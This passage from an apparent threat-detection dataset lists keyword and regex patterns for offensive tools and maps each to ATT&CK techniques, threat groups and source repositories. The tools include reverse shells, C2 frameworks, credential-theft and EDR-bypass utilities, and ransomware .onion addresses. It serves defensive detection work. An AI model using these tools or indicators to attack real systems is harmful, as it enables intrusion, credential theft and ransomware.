- Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - 
COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","38772" "*conpass -d * -u * -p *",".{0,1000}conpass\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","38773" "*conpass v* - Continuous password spraying tool*",".{0,1000}conpass\sv.{0,1000}\s\-\sContinuous\spassword\sspraying\stool.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","0","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","38774" "*conptyshell *",".{0,1000}conptyshell\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","38775" "*ConPtyShell.cs*",".{0,1000}ConPtyShell\.cs.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38776" "*ConPtyShell.exe*",".{0,1000}ConPtyShell\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38777" "*ConPtyShell.git*",".{0,1000}ConPtyShell\.git.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38778" "*ConPtyShell.zip*",".{0,1000}ConPtyShell\.zip.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38779" "*ConPtyShell.zip*",".{0,1000}ConPtyShell\.zip.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse 
Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38780" "*ConPtyShell_dotnet2.exe*",".{0,1000}ConPtyShell_dotnet2\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","38781" "*Console.Write(""InexorablePoSH*",".{0,1000}Console\.Write\(\""InexorablePoSH.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","38782" "*Console.WriteLine*self executing the payload*",".{0,1000}Console\.WriteLine.{0,1000}self\sexecuting\sthe\spayload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","38783" "*ConsoleHost_history.txt.jasmin*",".{0,1000}ConsoleHost_history\.txt\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","38784" "*-consoleoutput 
-DomainRecon*",".{0,1000}\-consoleoutput\s\-DomainRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","38785" "*-consoleoutput -Localrecon*",".{0,1000}\-consoleoutput\s\-Localrecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","38786" "*const commandToRun = ""mshta "" + htaPath*",".{0,1000}const\scommandToRun\s\=\s\""mshta\s\""\s\+\shtaPath.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","#content","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","38787" "*const Name = ""tun2socks""*",".{0,1000}const\sName\s\=\s\""tun2socks\"".{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","38788" "*const subscription_id = `TOPROXY_*",".{0,1000}const\ssubscription_id\s\=\s\`TOPROXY_.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - 
T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","38789" "*contact_harvester*",".{0,1000}contact_harvester.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38790" "*ContainYourself.cpp*",".{0,1000}ContainYourself\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38792" "*ContainYourself.exe*",".{0,1000}ContainYourself\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38793" "*ContainYourself.sln*",".{0,1000}ContainYourself\.sln.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38794" "*ContainYourself-main*",".{0,1000}ContainYourself\-main.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38795" "*ContainYourselfPoc.cpp*",".{0,1000}ContainYourselfPoc\.cpp.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38796" "*ContainYourselfPoc.exe*",".{0,1000}ContainYourselfPoc\.exe.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38797" "*ContainYourselfPoc\*",".{0,1000}ContainYourselfPoc\\.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38798" "*ContainYourselfTempFile.txt*",".{0,1000}ContainYourselfTempFile\.txt.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - 
T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","38799" "*ContentHijacking.swf*",".{0,1000}ContentHijacking\.swf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38800" "*contirec7nchr45rx6ympez5rjldibnqzh7lsa56lvjvaeywhvoj3wad.onion*",".{0,1000}contirec7nchr45rx6ympez5rjldibnqzh7lsa56lvjvaeywhvoj3wad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38801" "*contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion*",".{0,1000}contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38802" "*contiuevxdgdhn3zl2kubpajtfgqq4ssj2ipv6ujw7fwhggev3rk6hqd.onion*",".{0,1000}contiuevxdgdhn3zl2kubpajtfgqq4ssj2ipv6ujw7fwhggev3rk6hqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38803" 
"*convert_ccache_to_kirbi*",".{0,1000}\?convert_ccache_to_kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38807" "*convert_kirbi_to_ccache*",".{0,1000}\?convert_kirbi_to_ccache.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38808" "*Convert-ADCSFlag *",".{0,1000}Convert\-ADCSFlag\s.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","38809" "*Convert-ADCSPrivateKeyFlag*",".{0,1000}Convert\-ADCSPrivateKeyFlag.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","0","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","38810" "*ConvertFrom-CSV $attacksCSV*",".{0,1000}ConvertFrom\-CSV\s\$attacksCSV.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation 
tool","https://github.com/GDSSecurity/PSAttack","1","0","#content","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","38811" "*ConvertFrom-LDAPLogonHours*",".{0,1000}ConvertFrom\-LDAPLogonHours.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38812" 
"*ConvertFrom-UACValue*",".{0,1000}ConvertFrom\-UACValue.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","38813" "*Converting and saving TGT in UNIX format to file wce_ccache*",".{0,1000}Converting\sand\ssaving\sTGT\sin\sUNIX\sformat\sto\sfile\swce_ccache.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","38814" "*Convert-NetToLua -infile *",".{0,1000}Convert\-NetToLua\s\-infile\s.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","38815" 
"*Convert-NetToLua.ps1*",".{0,1000}Convert\-NetToLua\.ps1.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","1","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","38816" "*Convert-NT4toCanonical*",".{0,1000}Convert\-NT4toCanonical.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","38817" "*ConvertTo-LogonHoursArray*",".{0,1000}ConvertTo\-LogonHoursArray.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38819" "*ConvertTo-Rc4ByteStream*",".{0,1000}ConvertTo\-Rc4ByteStream.{0,1000}","offensive_tool_keyword","empire","empire function name. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","38820" "*ConvertTo-ROT13.ps1*",".{0,1000}ConvertTo\-ROT13\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","38821" "*ConvertTo-ROT13.ps1*",".{0,1000}ConvertTo\-ROT13\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","38822" "*ConvertTo-Shellcode -*",".{0,1000}ConvertTo\-Shellcode\s\-.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","0","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","38823" "*ConvertToShellcode*",".{0,1000}ConvertToShellcode.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","38824" "*ConvertTo-Shellcode.*",".{0,1000}ConvertTo\-Shellcode\..{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. 
